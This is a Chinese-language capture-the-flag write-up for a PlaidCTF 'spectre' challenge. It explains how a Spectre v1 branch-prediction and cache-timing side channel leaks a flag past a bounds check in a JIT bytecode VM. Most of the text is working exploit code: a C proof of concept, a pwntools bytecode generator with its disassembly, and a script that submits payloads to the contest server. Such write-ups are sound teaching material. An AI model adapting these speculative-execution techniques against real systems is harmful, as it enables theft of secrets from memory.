这个题考察的是在2018年1月公布的关于CPU分支预测的Spectre漏洞,具体细节可以看https://spectreattack.com/spectre.pdf
题目给了一个binary,逻辑很简单
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v3; // ebx
__int64 *v4; // rax
__int64 *v5; // rbp
__int64 v6; // rdx
v3 = 1;
v4 = calloc(1uLL, 0x1030uLL);
if ( argc > 1 )
{
v5 = v4;
v3 = 2;
if ( load_flag(v4, argv[1]) )
{
v3 = 3;
if ( fread(v5, 8uLL, 1uLL, stdin) == 1 && *v5 <= 0x1000 )
{
v3 = 4;
if ( *v5 == __fread_chk(v5 + 1, 0x1028LL, 1LL, *v5, stdin) )
{
v3 = 5;
if ( mmap(0x133700000000LL, 0x400000uLL, 3, 34, -1, 0LL) != -1LL )
{
v3 = 6;
if ( mmap(0x414100000000LL, 0x2000000uLL, 3, 34, -1, 0LL) != -1LL )
{
v3 = 7;
memset(0x133700000000LL, 0xCC, 0x400000uLL);
if ( jit(v5) )
{
v3 = mprotect(0x133700000000LL, 0x400000uLL, 5);
if ( v3 )
{
v3 = 8;
}
else
{
signal(14, alarm_handler);
alarm(0xAu);
the_vm = v5;
v5[513] = builtin_bc;
v5[514] = builtin_time;
v5[515] = rdtsc(0, v6);
MEMORY[0x133700000000]();
alarm(0);
fwrite(0x414100000000LL, 1uLL, 0x1000uLL, _bss_start);
}
}
}
}
}
}
}
}
return v3;
}
程序先通过load_flag
函数把flag读到calloc
申请的buffer的第0x1020
往后的内存中,同时程序还有如下的校验,我们在分析完程序后没有发现有什么漏洞可以绕过这个校验,因此根据题意需要我们通过Spectre
漏洞来泄露flag
...
fread(v5, 8uLL, 1uLL, stdin) == 1 && *v5 <= 0x1000
...
__int64 __fastcall builtin_bc(unsigned __int64 a1)
{
__int64 result; // rax
result = -1LL;
if ( *the_vm > a1 )
result = *(the_vm + a1 + 8);
return result;
}
程序会读取一段bytecode,然后通过jit
函数生成x86_64指令执行,但是这里能生成的x86_64指令非常有限,仅有如下几种
encode_prologue
push rsi
push rdi
push rbp
push r8
push r9
push r10
push r11
push r12
push r13
push r14
push r15
movabs rsi,0x133700000000
movabs rdi,0x414100000000
movabs rbp,buf+0x1008
encode_epilogue opcode:0
pop r15
pop r14
pop r13
pop r12
pop r11
pop r10
pop r9
pop r8
pop rbp
pop rdi
pop rsi
encode_add opcode:1
movsxd r8-r15, r8d-r15d
encode_add opcode:2
add r8-r15, r8-r15
encode_sub opcode:3
sub r8-r15, r8-r15
encode_and opcode:4
and r8-r15, r8-r15
encode_shl opcode:5
mov cl, r8b-r15b
shl r8-r15, cl
encode_shr opcode:6
mov cl, r8b-r15b
shr r8-r15, cl
encode_move opcode:7
mov r8-r15, r8-r15
encode_movc opcode:8
mov r8-r15, int32
encode_load opcode:9
mov eax, r8d-r15d
mov r8-r15, QWORD PTR [rdi+rax*1]
encode_store opcode:10
mov eax,r8d-r15d
mov QWORD PTR [rdi+rax*1], r8-r15
encode_builtin opcode:11
push rdi
push rsi
push r8-r11
mov edi,r8d
mov esi,r9d
mov edx,r10d
mov ecx,r11d
call QWORD PTR [rbp+xxx]
pop r11-r8
pop rsi
pop rdi
mov r8-r15, rax
encode_loop opcode:12
mov rax, int32
cmp r8-r15, rax
jle xxx
这里的jle
只能往低地址跳
这题由我和另外两个队友一起完成,我们的思路是先根据题目的上下文用C语言实现一个可以成功泄露的版本,大致如下
#include <emmintrin.h>
#include <sys/mman.h>
#include <x86intrin.h>
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
char *the_vm;
uint8_t restrictedAccess(size_t x)
{
if (x < *(unsigned long*)the_vm) {
return the_vm[x+8];
} else {
return 0;
}
}
int main(int arg, char **argv) {
FILE *in = fopen(argv[1], "r");
char line[0x20];
fgets(line, 0x20, in);
char *vm = calloc(0x1, 0x1030);
memcpy(&vm[0x1020], line, strlen(line));
*(unsigned long*)vm = 0x1000;
char *code = mmap((void *)0x133700000000, 0x400000, 3, 34, -1, 0);
char *addr = mmap((void *)0x414100000000, 0x2000000, 3, 34, -1, 0);
memset((void *)0x133700000000, 0xCC, 0x400000);
the_vm = vm;
size_t larger_x = 0x1018;
int i;
uint8_t s;
for (i = 0; i < 0x100; i++) {
addr[i*4096] = 1;
}
int ch = 0;
int count = 0;
while (1) {
for (i = 0; i < 66; i++) {
restrictedAccess(i);
}
for (i = 0x800000; i < 2*0x800000; i++) {
addr[i] = 1;
}
s = restrictedAccess(larger_x);
addr[s*4096] = 88;
int junk=0;
uint64_t time1, time2;
char *addr2;
int cnt = 0;
int res = 0;
for (i = 0x20; i < 0x80; i++){
addr2 = &addr[i*4096];
time1 = __rdtscp(&junk);
junk = *addr2;
time2 = __rdtscp(&junk) - time1;
*(unsigned long *)(0x414100000000 + i*8) = time2;
}
unsigned long min = -1;
for (i = 0x20; i < 0x80; i++) {
unsigned long tmp = *(unsigned long *)(0x414100000000 + i*8);
if (tmp < min) {
ch = i;
min = tmp;
}
}
if (min < 60) break;
count++;
}
printf("%c, %d\n", ch, count);
fwrite((const void *)0x414100000000, 1, 0x1000, stdout);
return 0;
}
上面的restrictedAccess
函数模拟了题目中的builtin_bc
,只是题目中判断失败会返回-1
。第46-48
行的循环是为了训练CPU的分支预测,使第54
行再次执行时会预测执行if
中的指令,这样通过后续addr[s*4096] = 88
写操作让CPU中有缓存,再在62-68
行的循环中根据访问时间来判断是否命中了缓存,以此来进行信息泄露。为了准确地判断是否命中缓存还需要先清空缓存,paper中使用了clflush
指令清空缓存,但是在题目中我们没有找到方法调用clflush
指令,然后我通过50-52
行的写操作来清空缓存,最后经过测试当访问时间的计数小于60
时结果比较准确,每个字符大概在100次以内能够跑出来。
C语言实现后再把它转成bytecode
from pwn import *
import struct
context.arch = 'amd64'
context.log_level = 'critical'
payload = ''
bc = ''
def encode_prologue(bc):
bc += '\x56\x57\x55'
for i in range(0, 8):
bc = push_reg(bc, i)
bc = mov_reg_const64(bc, 0x16, 0x133700000000)
bc = mov_reg_const64(bc, 0x17, 0x414100000000)
bc = mov_reg_const64(bc, 0x15, 0x666600000000 + 0x1008)
return bc
def push_reg(bc, reg):
if reg > 0xf:
reg = reg - 0x10
else:
bc += chr(0x41)
bc += chr(reg | 0x50)
return bc
def mov_reg_const64(bc, reg, val):
if reg > 0xf:
bc += chr(0x48)
bc += chr((reg - 0x10) | 0xb8)
bc += struct.pack('<Q', val)
return bc
def encode_epilogue(bc):
global payload
start = len(bc)
for i in range(7, -1, -1):
bc = pop_reg(bc, i)
bc += '\x5d\x5f\x5e\xc3'
payload += '\x00'
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
def pop_reg(bc, reg):
if reg > 0xf:
reg = reg - 0x10
else:
bc += chr(0x41)
bc += chr(reg | 0x58)
return bc
def cdq(reg, bc):
global payload
start = len(bc)
bc += '\x4d\x63' + chr(((8 * (reg & 7)) | (reg >> 3) & 7 | 0xC0))
payload += '\x01' + chr(reg)
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
def add(reg, bc):
global payload
start = len(bc)
bc += '\x4d\x01' + chr(reg | 0xC0)
payload += '\x02' + chr(reg)
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
def sub(reg, bc):
global payload
start = len(bc)
bc += '\x4d\x29' + chr(reg | 0xC0)
payload += '\x03' + chr(reg)
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
def my_and(reg, bc):
global payload
start = len(bc)
bc += '\x4d\x21' + chr(reg | 0xC0)
payload += '\x04' + chr(reg)
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
def shl(reg, bc):
global payload
start = len(bc)
bc += '\x44\x88' + chr(reg & 0x38 | 0xC1) + '\x49\xd3' + chr(reg & 7 | 0xE0)
payload += '\x05' + chr(reg)
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
def shr(reg, bc):
bc += '\x44\x88' + chr(reg & 0x38 | 0xC1) + '\x49\xd3' + chr(reg & 7 | 0xE8)
return bc
def mov(reg, bc):
global payload
start = len(bc)
bc += '\x4d\x89' + chr(reg | 0xC0)
payload += '\x07' + chr(reg)
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
def movc(reg, val, bc):
global payload
start = len(bc)
bc = mov_reg_const(bc, reg & 7, val)
payload += '\x08' + chr(reg) + struct.pack('<I', val)
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
def mov_reg_const(bc, reg, val):
if reg > 0xf:
bc += '\x48\xc7'
reg -= 0x10
else:
bc += '\x49\xc7'
bc += chr(reg | 0xC0)
bc += struct.pack('<I', val)
return bc
def load(reg, bc):
global payload
start = len(bc)
bc = mov_reg_reg(bc, 0x10, (reg >> 3) & 7)
bc += '\x4c\x8b' + chr(8 * (reg & 7) + 4) + '\x07'
payload += '\x09' + chr(reg)
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
def mov_reg_reg(bc, reg1, reg2):
if reg1 <= 0xf or reg2 > 8:
exit(-1)
bc += '\x44\x89'
bc += chr((reg1 - 0x10) | (8 * reg2) | 0xC0)
return bc
def store(reg, bc):
global payload
start = len(bc)
bc = mov_reg_reg(bc, 0x10, reg & 7)
bc += '\x4c\x89' + chr(reg & 0x38 | 4) + '\x07'
payload += '\x0a' + chr(reg)
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
def builtin(reg, bc):
global payload
start = len(bc)
if ((reg >> 3) & 7) <= 1:
bc += '\x57\x56'
for i in range(0, 4):
bc = push_reg(bc, i)
bc += '\x44\x89\xc7\x44\x89\xce\x44\x89\xd2\x44\x89\xd9\xff\x55' + chr((8 * ((reg >> 3) & 7)))
for i in range(3, -1, -1):
bc = pop_reg(bc, i)
bc += '\x5e\x5f\x49\x89' + chr(reg & 7 | 0xC0)
payload += '\x0b' + chr(reg)
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
def loop(reg, val, pos, bc):
global payload
start = len(bc)
bc = mov_reg_const(bc, 0x10, val)
bc += '\x49\x39' + chr(((reg >> 3) & 7) | 0xC0) + '\x0f\x8e' + struct.pack('<I', (1<<32) + (pos[1] - 0x10 - start))
payload += '\x0c' + chr(reg) + struct.pack('<I', val) + struct.pack('<I', pos[0])
# print "%d: %s" % (start, disasm(bc[start:len(bc)]))
return bc
if __name__ == '__main__':
DEBUG = 1
import sys
idx = int(sys.argv[1])
flag_pos = 0x1018+idx
count = 0
while True:
if DEBUG:
io = process(['./spectre', 'flag'])
# gdb.attach(io, 'b *0x0000555555554B00\n')
payload = ''
bc = ''
bc = encode_prologue(bc)
bc = movc(0, 0, bc)
bc = movc(1, 0x1000, bc)
bc = movc(2, 0x1, bc)
bc = movc(3, 0, bc)
offset1 = (len(payload), len(bc))
bc = store(0x93, bc)
bc = add(0xcb, bc)
bc = add(0x10, bc)
bc = loop(0xC3, 0xff, offset1, bc)
bc = movc(0, 0, bc)
offset2 = (len(payload), len(bc))
bc = builtin(7, bc)
bc = add(0x10, bc)
bc = loop(0xC3, 65, offset2, bc)
bc = movc(0, 0x800000, bc)
offset3 = (len(payload), len(bc))
bc = store(0xd0, bc)
bc = add(0x10, bc)
bc = loop(0xC3, 3*0x800000-1, offset3, bc)
bc = movc(0, flag_pos, bc)
bc = movc(4, 12, bc)
bc = movc(5, 0x6666, bc)
bc = movc(6, 0x000000ff, bc)
bc = builtin(7, bc)
bc = my_and(0xf7, bc)
bc = shl(0xe7, bc)
bc = store(0xef, bc)
bc = movc(0, 0x20, bc)
offset4 = (len(payload), len(bc))
bc = mov(0xc3, bc)
bc = shl(0xe3, bc)
bc = builtin(0xe, bc)
bc = load(0x1f, bc)
bc = builtin(0xf, bc)
bc = sub(0xf7, bc)
bc = mov(0xc3, bc)
bc = movc(5, 0x3, bc)
bc = shl(0xeb, bc)
bc = store(0xfb, bc)
bc = add(0x10, bc)
bc = loop(0xC3, 0x7f, offset4, bc)
bc = encode_epilogue(bc)
# print(disasm(bc))
if DEBUG:
io.send(p64(len(payload)))
io.send(payload)
# with open('payload_%d' % idx, 'wb') as f:
# f.write(p64(len(payload)) + payload)
# break
content = io.recvn(0x1000)
data = []
for i in range(0, 0x80-0x20):
data.append(u64(content[0x100+i*8:0x100+(i+1)*8]))
ch = 0
min_time = 0xffffffff
for i in range(0, 0x80-0x20):
if min_time > data[i]:
min_time = data[i]
ch = i
count += 1
if min_time < 60:
print 'idx:', idx, 'Yeah:', chr(ch+0x20)
print 'idx:', idx, 'count:', count
break
生成的x86_64指令如下
0: 56 push rsi
1: 57 push rdi
2: 55 push rbp
3: 41 50 push r8
5: 41 51 push r9
7: 41 52 push r10
9: 41 53 push r11
b: 41 54 push r12
d: 41 55 push r13
f: 41 56 push r14
11: 41 57 push r15
13: 48 be 00 00 00 00 37 movabs rsi,0x133700000000
1a: 13 00 00
1d: 48 bf 00 00 00 00 41 movabs rdi,0x414100000000
24: 41 00 00
27: 48 bd 08 10 00 00 66 movabs rbp,0x666600001008
2e: 66 00 00
31: 49 c7 c0 00 00 00 00 mov r8,0x0
38: 49 c7 c1 00 10 00 00 mov r9,0x1000
3f: 49 c7 c2 01 00 00 00 mov r10,0x1
46: 49 c7 c3 00 00 00 00 mov r11,0x0
4d: 44 89 d8 mov eax,r11d
50: 4c 89 14 07 mov QWORD PTR [rdi+rax*1],r10
54: 4d 01 cb add r11,r9
57: 4d 01 d0 add r8,r10
5a: 48 c7 c0 ff 00 00 00 mov rax,0xff
61: 49 39 c0 cmp r8,rax
64: 0f 8e e3 ff ff ff jle 0x4d
6a: 49 c7 c0 00 00 00 00 mov r8,0x0
71: 57 push rdi
72: 56 push rsi
73: 41 50 push r8
75: 41 51 push r9
77: 41 52 push r10
79: 41 53 push r11
7b: 44 89 c7 mov edi,r8d
7e: 44 89 ce mov esi,r9d
81: 44 89 d2 mov edx,r10d
84: 44 89 d9 mov ecx,r11d
87: ff 55 00 call QWORD PTR [rbp+0x0]
8a: 41 5b pop r11
8c: 41 5a pop r10
8e: 41 59 pop r9
90: 41 58 pop r8
92: 5e pop rsi
93: 5f pop rdi
94: 49 89 c7 mov r15,rax
97: 4d 01 d0 add r8,r10
9a: 48 c7 c0 41 00 00 00 mov rax,0x41
a1: 49 39 c0 cmp r8,rax
a4: 0f 8e c7 ff ff ff jle 0x71
aa: 49 c7 c0 00 00 80 00 mov r8,0x800000
b1: 44 89 c0 mov eax,r8d
b4: 4c 89 14 07 mov QWORD PTR [rdi+rax*1],r10
b8: 4d 01 d0 add r8,r10
bb: 48 c7 c0 ff ff 7f 01 mov rax,0x17fffff
c2: 49 39 c0 cmp r8,rax
c5: 0f 8e e6 ff ff ff jle 0xb1
cb: 49 c7 c0 18 10 00 00 mov r8,0x1018
d2: 49 c7 c4 0c 00 00 00 mov r12,0xc
d9: 49 c7 c5 66 66 00 00 mov r13,0x6666
e0: 49 c7 c6 ff 00 00 00 mov r14,0xff
e7: 57 push rdi
e8: 56 push rsi
e9: 41 50 push r8
eb: 41 51 push r9
ed: 41 52 push r10
ef: 41 53 push r11
f1: 44 89 c7 mov edi,r8d
f4: 44 89 ce mov esi,r9d
f7: 44 89 d2 mov edx,r10d
fa: 44 89 d9 mov ecx,r11d
fd: ff 55 00 call QWORD PTR [rbp+0x0]
100: 41 5b pop r11
102: 41 5a pop r10
104: 41 59 pop r9
106: 41 58 pop r8
108: 5e pop rsi
109: 5f pop rdi
10a: 49 89 c7 mov r15,rax
10d: 4d 21 f7 and r15,r14
110: 44 88 e1 mov cl,r12b
113: 49 d3 e7 shl r15,cl
116: 44 89 f8 mov eax,r15d
119: 4c 89 2c 07 mov QWORD PTR [rdi+rax*1],r13
11d: 49 c7 c0 20 00 00 00 mov r8,0x20
124: 4d 89 c3 mov r11,r8
127: 44 88 e1 mov cl,r12b
12a: 49 d3 e3 shl r11,cl
12d: 57 push rdi
12e: 56 push rsi
12f: 41 50 push r8
131: 41 51 push r9
133: 41 52 push r10
135: 41 53 push r11
137: 44 89 c7 mov edi,r8d
13a: 44 89 ce mov esi,r9d
13d: 44 89 d2 mov edx,r10d
140: 44 89 d9 mov ecx,r11d
143: ff 55 08 call QWORD PTR [rbp+0x8]
146: 41 5b pop r11
148: 41 5a pop r10
14a: 41 59 pop r9
14c: 41 58 pop r8
14e: 5e pop rsi
14f: 5f pop rdi
150: 49 89 c6 mov r14,rax
153: 44 89 d8 mov eax,r11d
156: 4c 8b 3c 07 mov r15,QWORD PTR [rdi+rax*1]
15a: 57 push rdi
15b: 56 push rsi
15c: 41 50 push r8
15e: 41 51 push r9
160: 41 52 push r10
162: 41 53 push r11
164: 44 89 c7 mov edi,r8d
167: 44 89 ce mov esi,r9d
16a: 44 89 d2 mov edx,r10d
16d: 44 89 d9 mov ecx,r11d
170: ff 55 08 call QWORD PTR [rbp+0x8]
173: 41 5b pop r11
175: 41 5a pop r10
177: 41 59 pop r9
179: 41 58 pop r8
17b: 5e pop rsi
17c: 5f pop rdi
17d: 49 89 c7 mov r15,rax
180: 4d 29 f7 sub r15,r14
183: 4d 89 c3 mov r11,r8
186: 49 c7 c5 03 00 00 00 mov r13,0x3
18d: 44 88 e9 mov cl,r13b
190: 49 d3 e3 shl r11,cl
193: 44 89 d8 mov eax,r11d
196: 4c 89 3c 07 mov QWORD PTR [rdi+rax*1],r15
19a: 4d 01 d0 add r8,r10
19d: 48 c7 c0 7f 00 00 00 mov rax,0x7f
1a4: 49 39 c0 cmp r8,rax
1a7: 0f 8e 77 ff ff ff jle 0x124
1ad: 41 5f pop r15
1af: 41 5e pop r14
1b1: 41 5d pop r13
1b3: 41 5c pop r12
1b5: 41 5b pop r11
1b7: 41 5a pop r10
1b9: 41 59 pop r9
1bb: 41 58 pop r8
1bd: 5d pop rbp
1be: 5f pop rdi
1bf: 5e pop rsi
1c0: c3 ret
bytecode只能在网站上提交
因此还写了一个提交的脚本
import requests
import subprocess
import sys
idx = int(sys.argv[1])
while True:
answer = subprocess.check_output(['hashcash', '-m', '-b', '28', '-r', 'spectre'])
# print answer[:-1]
data = {
'pow': answer[:-1],
'submit': 'Upload'
}
files = {
'script' : ('payload', open("./payload_%d" % idx, "rb"), 'application/octet-stream')
}
req = requests.post('http://spectre.pwni.ng:4000', data, files=files, allow_redirects=True)
text = req.history[0].text
# print text
start = text.find('<a href="') + len('<a href="')
end = text.find('">/')
url = text[start:end]
# print url
req = requests.get('http://spectre.pwni.ng:4000%s' % url)
text = req.text
# print text
lines = text.split('\n')
times = []
for i in range(35, 83):
nums = lines[i].split(' ')
times.append(int(nums[0], 16))
times.append(int(nums[2], 16))
# print times
min_time = 0xffffffff
ch = ''
for i in range(0, len(times)):
if times[i] < min_time:
min_time = times[i]
ch = i + 0x20
print 'idx:', idx, 'min_time:', min_time
if min_time < 60:
print 'idx:', idx, 'Yeah:', chr(ch)
break
else:
print 'idx:', idx, 'failed:', chr(ch)
由于要计算hashcash
,因此放在了一台56核的机器上跑,几分钟后就跑出了flagpctf{CPU2h4rd!}